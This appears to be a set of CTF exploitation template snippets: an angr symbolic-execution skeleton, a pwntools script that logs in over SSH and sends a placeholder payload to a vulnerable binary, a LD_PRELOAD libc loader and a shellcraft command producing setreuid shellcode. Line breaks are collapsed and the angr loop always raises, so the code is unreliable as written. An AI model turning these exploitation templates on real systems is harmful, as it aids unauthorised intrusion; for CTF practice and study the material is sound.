import angrimport sys​def main(argv):path_to_binary = "<binary>"project = angr.Project(path_to_binary)initial_state = project.factory.entry_state()sm = project.factory.simgr(initial_state)# list of basic blocks to find or to avoidsm.explore(find=[], avoid=[])for state in sm.deadended:print(state.posix.dumps(sys.stdin.fileno()))else:raise Exception('Could not find the solution')​if __name__ == '__main__':main(sys.argv)
#!/usr/bin/pythonfrom pwn import *​s = ssh(host='', user='', password='')p = s.run('cd <path> && ./<vuln>')p.recv()p.sendline(<payload>)p.interactive()s.close()
get = lambda x: [sh.recvuntil('{} : '.format(x)), int(sh.recvline())][1]p = get('p')
libc = ELF(<name>)main = ELF(<name>)r = main.process(env={'LD_PRELOAD' : libc.path})
pwn shellcraft -f d amd64.linux.setreuid 1002